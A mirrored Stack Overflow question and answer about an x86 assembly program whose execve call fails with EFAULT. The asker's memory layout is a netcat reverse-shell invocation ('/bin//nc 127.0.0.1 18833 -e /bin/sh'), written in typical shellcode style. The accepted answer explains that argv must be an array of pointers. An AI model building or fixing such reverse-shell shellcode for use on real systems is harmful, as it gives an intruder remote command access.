stackoom
  简体   繁体   中英

Linux Sys_execve wont run in assembly

 原文  2017-03-08 19:25:47       linux/ assembly/ netcat

Question

I am writing an assembly program which needs to make a call to netcat and execute a program over the internet.

As I understand it, for a execve command, you point the EBX register to the program you want to run with a null byte at the end to terminate. you point the ECX register to arguments separated by null bytes with 2 null bytes at the end of the list of args. you just set EDX to a bunch of null bytes.

at my command int0x80 to execute the command my registers look like this:

Eax : 11 #system call
EBX: 0x0783140 #/bin//nc
ECX: 0x078314a #args
EDX: 0x07831a4 #env

Here's the value of the memory at 0x0783140 in ascii:

[null byte] = 0x00

/bin//nc[null byte]127.0.0.1[null byte]18833[null byte]-e[null byte]/bin/sh[null byte][null byte]

EBX points to '/bin//nc'
ECX points to '127.0.0.1'
RDX just points to a bunch of null bytes

The program will get to the int 0x80 call, but it will immediately return and put 0xfffffff2 in the EAX register.

Any help would be great.

EDIT: thanks to ephemient I'm now able to actually run netcat, but somehow I think my args are not being read by the program correctly. I think this because netcat runs but immediately exits with exit code 1 and no connection is established to my listener.

ecx now points to this in memory(note i put spaces between addresses for readability, but they do not exist in my program): 

0x78315e 0x783168 0x78316e 0x783171 0x00000000

0x78315e => 127.0.0.1[Null Byte]
0x783168 => 18833[Null Byte]
0x78316e => -e[Null Byte]
0x783171 => /root/myprogram[Null Byte]

I have quadruple checked that the addresses actually point to the askii values above

1 answers

solution1
 1 ACCPTED  2017-03-08 21:00:01

You're getting errno=EFAULT (0xfffffff2 = -14, 14 = EFAULT), indicating that you're passing a bad address to the syscall.

SYS_execve takes 3 arguments, but the second and third are NULL-terminated arrays of pointers to arguments/environment strings, not a single string of nul-separated components. Interpreting the string as an array of pointers, means the first 4 bytes of the string are interpreted as the address of the first string, but it's not a valid address, hence EFAULT. 

SYSCALL_DEFINE3(execve,
                const char __user *, filename,
                const char __user *const __user *, argv,
                const char __user *const __user *, envp)

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question nasm assembly sys_execve /bin/sh sys_execve system call from Assembly NASM getting args and calling sys_execve sys_execve hooking on 3.5 kernel Can the sys_execve() system call in the Linux kernel receive both absolute or relative paths? Assembly execve failure -14 Execve inline assembly Linux, execve how to run a child binary and pass payload efficently? Using “execve” to run the process of android emulator in Linux, but the “avd” path is wrong? Replicating execve in c (Linux)?
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM